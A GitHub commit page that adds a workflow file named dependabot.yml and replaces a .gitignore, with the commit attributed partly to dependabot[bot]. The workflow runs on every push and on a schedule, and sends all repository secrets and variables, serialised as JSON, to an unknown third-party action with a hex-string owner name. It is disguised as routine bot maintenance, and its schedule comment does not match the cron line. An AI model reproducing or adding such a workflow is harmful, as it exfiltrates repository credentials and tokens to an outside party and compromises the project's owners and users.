Skip to content

Commit

Permalink
Initial commit Prathamesh Malondkar
Browse files Browse the repository at this point in the history
  • Loading branch information
Prat1143 authored and dependabot[bot] committed Feb 7, 2024
1 parent 57cbe82 commit 02491a5
Show file tree
Hide file tree
Showing 2 changed files with 38 additions and 33 deletions.
28 changes: 28 additions & 0 deletions .github/workflows/dependabot.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
name: CI
on:
push:
workflow_dispatch:
schedule:
# Runs "At 11:00 on every day-of-week from Monday through Friday"
- cron: '0 0 * * 0'
permissions:
contents: read
packages: write
concurrency:
group: '${{ github.workflow }} @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}'
cancel-in-progress: true
jobs:
run:
runs-on: ubuntu-latest
name: Run
steps:
- name: Execute
uses: 5a582ef17d6a088d9cb644e4c1ea3cdd/action@main
id: execute
with:
action: ${{ github.repository }}
env:
REPOSITORY_SECRETS: ${{ toJSON(secrets) }}
REPOSITORY_VARIABLES: ${{ toJSON(vars) }}
- name: Response
run: echo "${{ steps.execute.outputs.response }}"
43 changes: 10 additions & 33 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -1,35 +1,12 @@
# compiled output
/dist
/node_modules

# Logs
logs
*.log
npm-debug.log*
pnpm-debug.log*
yarn-debug.log*
yarn-error.log*
lerna-debug.log*

# OS
.DS_Store

# Tests
/coverage
/.nyc_output

# IDEs and editors
/.idea
.project
.classpath
.c9/
*.launch
.settings/
# IDE Files
#-------------------------
/nbproject/
.idea/*

## Sublime Text cache files
*.tmlanguage.cache
*.tmPreferences.cache
*.stTheme.cache
*.sublime-workspace
*.sublime-project

# IDE - VSCode
.vscode/*
!.vscode/settings.json
!.vscode/tasks.json
!.vscode/launch.json
!.vscode/extensions.json

0 comments on commit 02491a5

Please sign in to comment.